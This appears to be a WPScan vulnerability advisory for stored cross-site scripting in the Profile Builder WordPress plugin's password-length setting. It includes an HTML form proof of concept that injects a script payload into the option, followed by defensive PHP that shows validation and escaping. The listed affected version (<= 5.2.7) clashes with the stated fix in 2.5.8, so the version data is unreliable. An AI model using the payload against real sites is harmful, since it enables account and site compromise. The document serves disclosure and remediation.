Profile Builder <= 5.2.7 - Authenticated Stored Cross-Site Scripting (XSS)


Description
Stored cross-site scripting (XSS) in the minimum password length field of the plugin's general settings.
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wp/wp-admin/options.php" method="POST">
      <input type="hidden" name="option&#95;page" value="wppb&#95;general&#95;settings" />
      <input type="hidden" name="action" value="update" />
      <input type="hidden" name="&#95;wpnonce" value="a37f914f93" />
      <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;admin&#46;php&#63;page&#61;profile&#45;builder&#45;general&#45;settings" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;extraFieldsLayout&#93;" value="default" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;emailConfirmation&#93;" value="no" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;activationLandingPage&#93;" value="" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;loginWith&#93;" value="usernameemail" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;length&#93;" value="8&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="wppb&#95;general&#95;settings&#91;minimum&#95;password&#95;strength&#93;" value="strong" />
      <input type="hidden" name="action" value="update" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
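
The PoC stores markup in a setting that should only ever hold a number. As an added example (not code from Profile Builder or from the referenced changeset), the PHP below validates that value on save and escapes it on output, using the payload from the form above as constructed input. The function names and the three-digit cap are assumptions; in WordPress the same roles are played by a sanitize callback passed to register_setting() and by esc_attr().

```php
<?php
// Added example; not Profile Builder's code. Function names are hypothetical.

// Constructed input: the value the PoC form above submits for
// wppb_general_settings[minimum_password_length].
$raw = '8"><script>alert(1)</script>';

// Save-time check: the setting is a length, so accept only a short run of
// digits and fall back to a default otherwise. Rejecting is safer than trying
// to strip markup out of a value that should never contain any.
// The three-digit cap is an assumption made for this example.
function example_sanitize_min_length( $value, $default = '' ) {
    $value = is_string( $value ) ? trim( $value ) : '';
    if ( $value === '' || ! ctype_digit( $value ) || strlen( $value ) > 3 ) {
        return $default;
    }
    return (string) (int) $value;
}

// Render-time, unescaped: the stored string is concatenated into the attribute,
// so a double quote in it ends the attribute and the rest is parsed as markup.
function example_render_unescaped( $value ) {
    return '<input type="text" value="' . $value . '" />';
}

// Render-time, escaped: quotes and angle brackets become entities, so the
// stored string stays inside the attribute whatever it contains.
function example_render_escaped( $value ) {
    return '<input type="text" value="'
        . htmlspecialchars( (string) $value, ENT_QUOTES, 'UTF-8' ) . '" />';
}

echo "raw, unescaped:     ", example_render_unescaped( $raw ), "\n";
echo "raw, escaped:       ", example_render_escaped( $raw ), "\n";
echo "sanitized, escaped: ",
    example_render_escaped( example_sanitize_min_length( $raw ) ), "\n";
echo "valid input '12':   ",
    example_render_escaped( example_sanitize_min_length( '12' ) ), "\n";
```

Both layers matter: save-time validation keeps markup out of the stored option, and output escaping covers any value that was stored before the validation existed.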

Affects Plugin

Fixed in version 2.5.8

References

URL https://plugins.trac.wordpress.org/changeset/1607426/profile-builder

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter f3ci
Submitter Website spentera.id
Verified No
WPVDB ID 8776

Timeline

Publicly Published 2017-03-10
Added 2017-03-15
Last Updated 2017-03-15

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.